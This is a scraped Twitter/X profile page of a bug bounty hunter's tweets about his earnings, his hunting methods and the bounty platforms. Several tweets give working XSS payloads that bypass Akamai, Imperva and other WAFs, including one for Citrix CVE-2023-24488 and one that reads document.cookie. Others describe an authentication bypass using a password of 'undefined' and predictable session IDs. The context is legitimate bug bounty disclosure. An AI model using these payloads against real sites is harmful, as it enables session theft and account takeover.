🇪🇨🍫
@bxmbn
Followers
17,698
Following
1
Media
162
Statuses
1,390
Explore trending content on Musk Viewer
FEMA
• 456407 Tweets
Mutombo
• 207618 Tweets
Mets
• 159202 Tweets
Verizon
• 115449 Tweets
Braves
• 92955 Tweets
Kemp
• 81758 Tweets
Pete Rose
• 71106 Tweets
#grandefratello
• 44943 Tweets
Lindor
• 31846 Tweets
Hall of Fame
• 28486 Tweets
Titans
• 27131 Tweets
#الاجتياح_البري
• 27061 Tweets
Dolphins
• 23657 Tweets
Seahawks
• 17093 Tweets
あと3ヶ月
• 16919 Tweets
コーヒーの日
• 15221 Tweets
Happy New Month
• 14681 Tweets
WELCOME HOME BAMBAM
• 14223 Tweets
都民の日
• 12712 Tweets
Hit King
• 12653 Tweets
#SnowManライブグッズ
• 12032 Tweets
愛知1区
• 11240 Tweets
残り3ヶ月
• 11069 Tweets
河村たかし名古屋市長
• 10466 Tweets
This year I Completed 500k in bounties
Most rewarded vulnerabilities and the ones I always focused since the beginning:
1. XSS (all types)
2. Cache Poisoning
3. BACs
Reached this amount totally from scratch, learning from the internet.
No certs.
0 Automation.
0 Collabs.
124
141
2K
Total Earnings by Year
2020 - $850.00
2021 - $19,750.00
2022 - $86,744.50
2023 So Far - $168,034.00
17 y/o me never thought about it, started with 0 Knowledge, curious trying to make money while being at home due to the pandemic, with patience it became my main source of income
87
113
1K
While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass:
post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
27
278
1K
If you are a beginner in bug bounty I recommend don’t ever buy any courses, nor look for mentors
Nothing will guarantee you success in bug bounty
I learned and keep learning myself by googling, reading hacktivity reports etc never spent a single dollar to learn
Just an advice
42
106
807
What is this 😭
username=bombon&password=undefined
200 OK
username=AnyUser&password=undefined
200 Ok
It gives you the access token just by providing the username and requesting the password as ‘undefined’ letting you to basically authenticate to any account..
31
69
754
Been hunting for almost 3 years now, only focusing in XSS, learned other vuls by just reading
never bought courses, don’t use automation tools, not even burp pro and still manage to make a solid monthly income
Its not hard, if you see it hard, then it will be hard.
48
72
689
I was rewarded $9.600 bounties 2day and achieved what seemed to be impossible for a long time
Top 100 All-Time ✅
51
30
635
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅
It’s just art at this point 🎨🖌️
41
106
624
March's total Bounties: $32,119
5 Broken Access Control: $17,237
4 Reflected XSS = $9,671
2 Cache Deception = $2,789
1 Cache Poisoning - Stored XSS = $1,250
Retests and Bonuses: $1,172
40
25
629
Today's XSS in a Multi-Reflection case:
xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
20
145
617
Wanna know How I prevented a Mass Data Breach?
Go Read:
Wanna know How a Bank offer led to PII Leak?
Go Read:
More writeups coming soon 🖤
20
113
593
Everything after /? is being reflected
?xss is reflected as Uppercase
=xss as Lowercase
The app is using Imperva WAF, however that feature allowed me to bypass it using:
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
21
100
589
My main goal is to get a million bounties and prove to all of you that you can success in Bug Bounty only by:
knowing the basics.
Not using tools/automation.
Thinking like a real black hat.
33
38
568
Top bb hunters stay at top because they never share their methodology, and if they do, it is always for a few people, never publicly
This is probably one of the reasons why most of them have never even disclosed a single report.
58
36
566
Blocked:
<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)
Bypass:
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
20
138
555
This program rewards bounties even on weekends
This program’s dedication is the reason why I’m having success
22
17
483
Stored XSS using Google Reviews 2
If you wonder why I submitted the review like that
It was because if I put </script> Google would render as blank (try it)
So I submitted another review with another account
Containing the rest of the payload so it could work ><svg onload=..
13
67
494
April's total Bounties: $11,689
5 Reflected XSS = $6,948
3 Broken Access Control: $1,400
1 Cache Deception = $3,000
Retests and Bonuses: $341
Worst bounty month since January of last year ($8,519)
43
8
490
Story Time:
@Agornello
Caesar (turtle_shell) was the one who taught me about Cache Poisoning without even asking for it, after that report my life pretty much changed, I took every advice and took advantage of it
This is how important Triagers can be in the life of a researcher
Today was my last day working at
@Hacker0x01
! It has been an incredible journey and I had the pleasure to work with an amazing team.
Much kudos to all the triagers out there, it's a hard job and they are real heroes.
Also <3 to (most of) the hackers.
turtle_shell / caesar
50
3
355
26
41
482
Write ups coming up in 2024:
- Accessing 30 Million User’s Orders
- How I was able to steal your Insurance Plan
- UI:None Cache Poisoning/Deception Cases
- Stealing Bank Mail Offers To PII Leak
- Akamai Biggest Problem
Comment which one you want to see first 🤔
68
31
473
I just found a bypass of this writeup I did last year
Writeup by the end of September 🤙🏽
9
39
483
Its been 3 years since I started bug bounty hunting
600+ resolved reports in ~100 Companies
Still so much to learn and so much to earn as well 🫶🏽
45
20
448
Thank you to all cdn providers for inventing caching
Special mention to devs who don’t sanitize headers and cookies either 🫡
26
38
423
magicId=00192729301
Set-Cookie: SessionId=<sessionId.00192729301>
magicId=00192729302
Set-Cookie: SessionId=<sessionId.00192729302>
2023 and we still have these types of bugs lol
By the way, this is P1 In my books 🤓👆🏽
19
51
421
Each parameter reflects as Event Attributes in each Input tag, but each parameter is limited to 10 characters
Being limited to 10 characters was a good thing because it also allowed me to bypass the WAF 🤓
VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus
13
72
413
Critical Bounty today to finally reach the 10,000 Rep Milestone
It’s crazy that few days ago I was at 8,384 Rep🔝
26
6
390
Request header is easy to find as it’s a response header that reflects in all pages, they also have a public program, affects main domain, and a lot of hackers who know this attack in the leaderboard, maybe this can confirm I have the best WAF bypass 😌
17
30
383
My tweets were able to get me an invite 🙏🏽
I might be able to continue at the top 🤞🏽
12
12
368
💰✅
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅
It’s just art at this point 🎨🖌️
41
106
624
23
28
349
There are some changes guys 😝
• I cannot do the Akamai one yet, but sometime in 2024 I should have the green light
• There was actually a mistake, It’s 3 Million not 30, Still a mass data breach due to the sensitive info exposed
Will publish 2 blogs in January 5th
Write ups coming up in 2024:
- Accessing 30 Million User’s Orders
- How I was able to steal your Insurance Plan
- UI:None Cache Poisoning/Deception Cases
- Stealing Bank Mail Offers To PII Leak
- Akamai Biggest Problem
Comment which one you want to see first 🤔
68
31
473
10
26
346
Goals for the new year?
None.
I had none last year and it was my most successful year in every aspect to date that my old self wouldn’t even believe it
If you set goals, you are limiting yourself, you could do more than anything you set today
Happy New Year!
13
15
314
Got some delayed bounties In September
T-Mobile BBP Robbed me like 15k fixing crits and not paying but all good 😝
13
15
309
Hackerone vs Bugcrowd
Programs with higher bounties
Winner: Bugcrowd
Exclusive programs (Top Companies)
Winner: H1
Support
Winner: Bugcrowd
Triagers (communication, knowledge and response times)
Winner: H1 (by a lot)
16
20
305
Today, I learned that if there is a bypass
I should not name the title of the report “Bypass of …” anymore
9
12
268
I have probably the best Akamai XSS bypass until date
It works everytime, I could share it but if i do, Akamai will fix it
Devs should sanitize their inputs so that they dont rely on WAF, plus I make more money 😼🤝🏼😼
26
7
249
Will disconnect for a while🫡
Finished sending my last reports, Hopefully they get all triaged so they can cover all my expenses for the following days 🛫🏝️
21
2
251
My reaction when my hardest xss bypass gets closed as an ‘internal’ duplicate
17
8
254
Me after reporting a Critical CVE and getting rewarded a Critical Bounty
5
6
245
Found a vulnerable request that always loads when navigating through the app
The cache duration is great I just need to wait until it expires and poison it with XSS to achieve ZERO UI Stored XSS
And the best part of it:
Big company + I use their services
7
13
238
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter
Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
15
11
235
More and more BBPs programs leaving/closing at a crazy rate
New VDPs every month
Almost 300 Reports in less than a week for this new VDP
We are doomed.
33
15
229
Finally man!!
last time I got multiple invitations was literally a year ago
Time to make more bounties before the year ends 🙏🏽
11
6
223
Gotta keep your eyes open ✅
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter
Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
15
11
235
12
8
220
I’m making more than the average and most professions
Getting into Bug bounty was the best decision I took even though I tried to quit at somepoint because I was not seeing results, Life its about decisions
Great things never come easy
Top 100 All time Soon
21
9
217
Some of the reasons why VDPs still exist today:
*VDP-only hackers this year so far*
24
7
216
Cache Poisoning XSS that does not require a file extension to cache and affects multiple pages should be treated as Critical
It’s insane that still to this day and after reporting them multiple times, the severity is treated as it was a normal limited stored XSS
6
11
214
In 14 days I will be disclosing two reports
Can't wait for you to see these, especially the XSS one, it was a pretty clever find!
8
9
208
3 Months ago, I bought stocks from a company using some of the bounties I earned with them and the company it’s up more than 40% now
12
3
208
don’t report bugs to vdps, especially those who are multi-millionare companies this way we can force them to open bbps 😝
9
13
200
Me when VDP points get removed from all platforms and seeing all VDP Hackers go down to 0 points:
20
6
202
Proud to have a 740 credit score and 100k available credit at 20 years old in just 2 years of credit 🔐
13
4
201
At least they rewarded the bounty before banning me
It was a good program after all
made 110k in this program alone
But they disappointed me with their decision
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work
Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
168
11
6
197
For anyone wondering more than half of my earnings are just XSS vulnerabilities.
Q2 2022 is when I learned about Cache Poisoning
This is why you see the increase on bounties since I found multiple Stored XSS via Cache Poisoning and stuck with it afterwards.
3
3
190
Most of my generation will be graduating by 25 and they might have saved a bit of money
Me at 20 I’m on my way to retire at 25 📈 🤞🏽
10
12
180
I noticed that you get private invitations based on what you search on google
I was looking at for cars at 1am today and got a private Invite from a Car company at 4 am
I was able to confirm this since I saw the same behavior on the other platform I hunt already.
19
4
187
People that hunt on vdps is what keep them alive
We can all force them to open BBP’s only if nobody hunts on VDPs
16
17
186
@mouka0x
Hashtag in this post:
#BugBounty
💰
Your Bounties: $0,0000 😔
AON VDP: Thank you so much, I don’t need to open a BBP anymore 😊🥰
13
1
181
Feels good when you receive an program invite and you use their services already
So far:
1 critical
1 High
7 Mediums
This always lets you have a huge advantage, especially on a program with limited scope, since others hackers need to go to the process of creating an account
7
5
179
Found an XSS endpoint where the server creates files without sanitation you can create a file then share it to anyone, you can also edit user’s files to save XSS on it using the uniqueId which is vulnerable to IDOR
Whats Your CVSS Score?
18
7
175
This program is just unbelievable, they have Mass PII leak as Critical, I reported mass PII Leak and they only rewarded as High. They didn’t follow their own policy, nor explained why.
But then I found an RXSS and they did followed their policy this time and rewarded as Low 🙂
8
9
173
I’m by myself in a program with 446 rep points and a total of 32,900 in bounties paid
Top bounty:5k
While I’m also in another program where there is only 1 hacker that has earned 20,000 in bounties but WITH 444 rep points
Top Bounty: 3k
Rep system is broken in H1 😭
7
5
169
Hackerone should pay me for indirectly promoting them 😂
Like everytime I tweet about my bounties new people ask me how to start
I will be happy only with more private invites tho
@Hacker0x01
👀
13
6
167
Biggest tip I can give you
Dont get mad or sad of others success
If you get mad as a result of others people’s success you are not going no where, you are lost..
Instead take as a challenge. you will overcome yourself and will help you in anything in life
7
13
163
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work
Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
168
1 year as a H1 Clear Member
I have seen few to zero benefits from what they state you will get as a H1 Clear member....
7
2
161
I never attacked anyone, If you can make these amounts of points in vdps you have the ability to do the same in a bbp thats all
They said it’s not of my business, but if more companies see they can still get good-impactful-quality reports without having to reward, we’re fucked.
Some of the reasons why VDPs still exist today:
*VDP-only hackers this year so far*
24
7
216
14
6
164